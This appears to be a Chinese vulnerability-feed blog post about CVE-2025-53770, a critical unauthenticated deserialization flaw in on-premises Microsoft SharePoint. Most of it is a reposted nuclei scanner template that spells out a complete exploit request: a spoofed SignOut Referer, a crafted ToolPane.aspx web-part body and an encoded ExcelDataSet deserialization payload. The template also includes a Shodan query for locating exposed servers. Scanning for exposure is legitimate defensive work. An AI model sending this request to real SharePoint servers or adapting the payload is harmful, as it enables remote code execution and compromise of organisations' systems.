Microsoft SharePoint Remote Code Execution Vulnerability

漏洞信息

漏洞名称: Microsoft SharePoint Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2025-53770

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: Microsoft SharePoint Server是一款广泛使用的企业级协作平台,支持文档管理、团队协作和业务流程自动化。它通常部署在企业内部网络中,用于提高团队协作效率。此次曝光的漏洞CVE-2025-53770涉及SharePoint Server中的不安全反序列化问题,允许未经授权的攻击者通过网络执行代码。漏洞的技术根源在于SharePoint Server在处理特定请求时,未能正确验证和清理用户提供的数据,导致恶意构造的序列化数据可以被执行。这种漏洞的利用不需要用户认证,攻击者可以远程利用此漏洞执行任意代码,可能导致服务器完全被控制,数据泄露或服务中断。由于Microsoft已确认存在野外利用,且漏洞的CVSS评分为9.8(严重),所有使用受影响版本的SharePoint Server的用户应立即采取缓解措施,以防止潜在的攻击。

产品厂商: Microsoft

产品名称: SharePoint Server

搜索语法: http.component:”Sharepoint”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/948fec84c71530fd88541a16ce52c9af580d2c62/http%2Fcves%2F2025%2FCVE-2025-53770.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55

id: CVE-2025-53770

info:
  name: Microsoft SharePoint - Remote Code Execution "Toolshell"
  author: SamIntruder
  severity: critical
  description: |
    Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
  impact: |
    Unauthenticated attackers can exploit unsafe deserialization to achieve remote code execution on SharePoint Server,leading to full system compromise.
  reference:
    - https://github.com/hazcod/CVE-2025-53770/blob/main/pkg/payload/test_payload.go
    - https://x.com/codewhitesec/status/1944743478350557232
    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53770
  classification:
    cve-id: CVE-2025-53770
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Sharepoint"
  tags: cve, cve2025, kev, sharepoint, rce

http:
  - raw:
      - |
        POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
        Host: {{Host}}
        Referer: /_layouts/SignOut.aspx
        Content-Type: application/x-www-form-urlencoded

        MSOTlPn_Uri={{Scheme}}://{{Host}}&MSOTlPn_DWP=%0A%3C%25%40%20Register%20Tagprefix%3D%22Scorecard%22%20Namespace%3D%22Microsoft%2EPerformancePoint%2EScorecards%22%20Assembly%3D%22Microsoft%2EPerformancePoint%2EScorecards%2EClient%2C%20Version%3D16%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D71e9bce111e9429c%22%20%25%3E%0A%3C%25%40%20Register%20Tagprefix%3D%22asp%22%20Namespace%3D%22System%2EWeb%2EUI%22%20Assembly%3D%22System%2EWeb%2EExtensions%2C%20Version%3D4%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35%22%20%25%3E%0A%3Casp%3AUpdateProgress%20ID%3D%22UpdateProgress1%22%20DisplayAfter%3D%2210%22%20runat%3D%22server%22%20AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%20%20%3CProgressTemplate%3E%0A%20%20%20%20%3Cdiv%20class%3D%22divWaiting%22%3E%0A%20%20%20%20%20%20%3CScorecard%3AExcelDataSet%20CompressedDataTable%3D%22H4sIAADEfmgA%2F4WRX2uzMBTG7%2F0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9%2BPEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c%2Bc1Umalp33%2F0%2F62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl%2BftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S%2FVeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1%2Bt%2Fpbj%2BvyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA%3D%22%20DataTable%2DCaseSensitive%3D%22false%22%20runat%3D%22server%22%3E%3C%2FScorecard%3AExcelDataSet%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%20%20%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A

    matchers:
      - type: dsl
        name: decoded_response
        dsl:
          - 'contains(gzip_decode(base64_decode(encoded_response)), "IntruderScannerDetectionPayload")'
          - '!contains(body, "SAMLSubmitButton")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        name: encoded_response
        regex:
          - 'CompressedDataTable="(.*?)"'
        internal: true


Github Poc
#projectdiscovery/nuclei-templates:github issues #反序列化
Microsoft SharePoint Remote Code Execution Vulnerability
http://example.com/2025/07/22/github_3540343723/
作者
lianccc
发布于
2025年7月22日
许可协议